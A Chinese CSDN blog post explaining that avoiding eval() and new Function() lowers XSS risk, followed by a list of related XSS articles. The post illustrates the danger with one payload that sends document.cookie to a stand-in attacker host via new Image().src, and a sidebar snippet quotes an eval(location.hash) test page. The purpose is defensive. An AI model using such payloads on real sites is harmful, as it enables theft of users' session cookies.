降低XSS攻击的风险之一,避免使用eval和Function构造器

最新推荐文章于 2024-05-15 11:10:22 发布
最新推荐文章于 2024-05-15 11:10:22 发布
阅读量2.1k 收藏 2
点赞数
分类专栏: js 文章标签: JS 性能优化
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_37722222/article/details/89950175
版权

通常:避免使用 eval() 和 new Function() 。动态运行代码不但速度较慢,还有潜在的安全风险。一般都可以找到更好地替代方案。

避免使用eval和new Function的确是降低XSS攻击的风险之一,注意是“之一”,不是全部方法,导致XSS攻击的漏洞很多,都需要堵。

XSS,也就是Cross Site Scripting,说到底就是网站存在漏洞,在浏览器端执行由用户决定的script内容,因为这样的script完全失控,所有可以是任何script,包括把用户的cookie发送给第三方网站(也就是坏人的网站)。

最简单直接的例子。

// 用户的输入可以操纵input的结果如下
input = 'new Image().src="http://badass.com/"+document.cookie';

// 代码中直接eval这个input
eval(input);

这样就把用户的cookie泄露了,坏人可以利用这些cookie干坏事,比如盗取用户信息,甚至盗取用户的钱。

防止XSS攻击也就是要让网页不要执行任意用户输入的内容,eval和new Function这两种方式天生即使把一个字符串当script来执行,谁也说不准输入的字符串哪来的,也许经过了处理,也许没有,没处理过的字符串就可以让eval干任何事,为了安全着想,最好不要用,实际上,绝大部分使用eval和new Function的场合,都可以换成其他方式实现同样功能,所以,别用了。

cnccl-web-js
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
什么是 XSS 攻击,如何避免
黑马程序员广州中心的专栏
05-18 421
XSS 攻击,即跨站脚本攻击(Cross Site Scripting),它是 web 程序中常见的漏洞。 原理 攻击者往 web 页面里插入恶意的 HTML 代码(Javascript、css、html 标签等),当用户浏览该页面时,嵌入其中的 HTML 代码会被执行,从而达到恶意攻击用户的目的。如盗取用户 cookie 执行一系列操作,破坏页面结构、重定向到其他网站等。 种类 1、DOM Based XSS:基于网页 DOM 结构的攻击 例如: input 标签 value 属性赋值 //jsp &..
浅谈如何防御xss攻击
xj28555的博客
07-23 523
笔前闲聊 最近都在写一些防守型文章,是因为笔者在最近的学习当中发现一些当初以攻击者角度学习的知识在某些特殊的场合下会表现的有点不够全面,总是感觉某些知识点联系不在一起,所以最近总是写一些防御型文章来把一些知识加强理解,在脑子里形成自己的知识脑图。 认识xss 首先还是来了解什么是xss,师傅们对这个东西估计也挺熟的啦,我就直接上百度了。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页...
记一次XSS绕过的思路
xiaopan233的博客
05-12 1744
目录 介绍 绕过的第一个思路(慎点,失败了。。。) 绕过的第二个思路(成功的) 网上下载了一个论坛的模板源码。是用PHP写的。闲来无事便对其测试了一番。论坛上最忌讳的漏洞之一就是存储型XSS了。本文记录一下测试的过程和思路。也许能对XSS的攻击思路有些启发把 本次实验还有视频哦:https://www.bilibili.com/video/av52266043 论坛模板源码: 链接:...
XSS总结(含绕过)
weixin_50464560的博客
07-28 946
XSS总结 By七友 / 2019-02-16 09:42:00 / 浏览数 35528 <span class="content-...
js里哪些封装好的函数可以触发XSS
最新发布
qq_38796056的博客
05-15 156
在JavaScript中,可以通过DOM XSS测试来检查代码中是否有潜在的XSS漏洞。使用现代的Web应用程序安全库,如Content Security Policy (CSP)。使用DOM操作方法时,始终确保输入是被正确的处理,不会被解释为代码。避免使用可以执行字符串为代码的方法。对输入进行适当的清理和编码。
xss绕过方法有哪些?XSS攻击绕过过滤方法技巧分享(xss绕过宝塔)
白帽子佳奇的博客
12-12 4543
XSS(跨站脚本攻击)绕过方法是一系列技巧,用来绕过目标网站的安全措施和过滤器,执行恶意的脚本。
xss跨站脚本攻击姿势大全
qq_56438857的博客
05-25 1003
xss攻击的四十种姿势
XSS攻击 eval(location.hash.substr(1)); 笔记
滕青山博客
02-16 2828
前言 参考文档:web前端黑客技术揭秘笔记 第三章 假设已经配置好hosts文件: 127.0.0.1 www.foo.com 127.0.0.1 www.evil.com 配置 根目录新建xssme.html文件,内容为: <script> eval(location.hash.substr(1)); </script> 以及alert.js文件,内容为: alert("123"); alert 浏览器访问http://127.0.0.1/xssme
跨站攻击XSS原理及代码示例
2301_77778490的博客
09-15 812
这种攻击可能会让用户根本不知道他们的信息已经被盗或者他们的电脑已经被监控,从而让攻击者可以实时地监控用户的网络活动或者窃取用户的个人信息。例如,我们可以通过注入更复杂的JavaScript代码来完全控制用户的浏览器,从而执行任意操作,如记录用户的键盘输入、监控他们的网络活动、窃取他们的个人信息等等。XSS攻击的危害非常大,它可以让攻击者完全控制用户的浏览器,窃取用户的隐私,破坏用户的账户,甚至在其他网站上执行恶意操作。请注意,以上只是XSS攻击的基础示例,实际中的XSS攻击可能更加复杂和难以防范。
XSS跨站脚本攻击初探
明天回火星
07-07 530
XSS跨站脚本攻击的基本原理和SQL 注入攻击类似(个人观点),都是利用系统执行了未经过滤的危险代码,不同点在于XSS是一种基于网页脚本的注入方式,也就是将脚本攻击载荷写入网页执行以达到对网页客户端访问用户攻击的目的,属于客户端攻击。而SQL注入攻击将危险代码绕过正常的文本输入变为可执行的SQL执行语句从而操纵数据库,从而进一步探测、操纵数据库信息。属于服务器攻击?(菜鸟看法)。 XSS攻击
预防XSS攻击和SQL注入XssFilter
05-19
一、什么是XSS攻击 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如...
基于Java的高级XSS攻击过滤器设计源码
04-08
高级XSS攻击过滤器 - 基于Java开发,包含33个文件,如XML、JAVA、GITIGNORE、NAME和IML等。该系统实现了一个有选择地过滤XSS攻击代码的功能,通过Java技术实现界面交互和功能模块,为用户提供了一个高效、安全的XSS...
springboot2.x使用Jsoup防XSS攻击的实现
10-15
SpringBoot 2.x 使用 Jsoup 防XSS攻击的实现主要是为了保护应用程序免受跨站脚本(Cross-Site Scripting,简称XSS)的威胁。XSS攻击是一种常见且危害极大的网络安全问题,它允许攻击者在受害者的浏览器上执行恶意...
前端安全之XSS攻击
02-25
XSS(cross-sitescripting跨域脚本攻击)攻击是最常见的Web攻击,其重点是“跨域”和“客户端执行”。有人将XSS攻击分为三种,分别是:1.ReflectedXSS(基于反射的XSS攻击)2.StoredXSS(基于存储的XSS攻击)3.DOM-...
Web安全之XSS攻击与防御小结
02-23
恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。攻击者对含有漏洞的服务器发起XSS攻击(注入JS代码)。诱使受害者打开受到攻击...
Javascript之eval与new Function的差异
summer的专栏
05-07 1611
当你必须要将字符串当做代码来执行,很多人第一印象
浅谈XSS攻击的那些事(附常用绕过姿势)
qq_42801460的博客
03-29 1404
有的时候,服务器往往会对代码中的关键字(如alert)进行过滤,这个时候我们可以尝试将关键字进行编码后再插入,不过直接显示编码是不能被浏览器执行的,我们可以用另一个语句eval()来实现。由于盗取的cookie需要传回给攻击者,因此往往需要一个服务器来接收盗取的cookie,这也就是xss平台的作用了。也就是攻击相对于访问者而言是一次性的,具体表现在我们把我们的恶意脚本通过url的方式传递给了服务器,而服务器则只是不加处理的把脚本“反射”回访问者的浏览器而使访问者的浏览器执行相应的脚本。
最全--跨站脚本攻击(XSS)举例和预防方法
Keep trying, keep going
04-30 1433
跨站脚本攻击(XSS)是指攻击者通过,从而窃取用户信息、篡改网页内容等。。
前端安全之XSS
2301_76694151的博客
04-26 390
XSS, 即为(Cross Site Scripting), 中文名为跨站脚本, 是发生在目标用户的浏览器层面上的,当渲染DOM树的过程成发生了不在预期内执行的JS代码时,就发生了XSS攻击。跨站脚本的重点不在‘跨站’上,而在于‘脚本’上。大多数XSS攻击的主要方式是嵌入一段远程或者第三方域上的JS代码。实际上是在目标网站的作用域下执行了这段js代码。
springboot如何实现使用过滤器防止xss攻击和sql注入
06-09
Spring Boot可以通过使用过滤器(Filter)来防止XSS攻击和SQL注入。 1. 防止XSS攻击:可以使用过滤器对请求参数进行过滤,将其中的特殊字符进行转义,从而避免XSS攻击。例如,可以使用Jsoup库中的`clean`方法来过滤...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值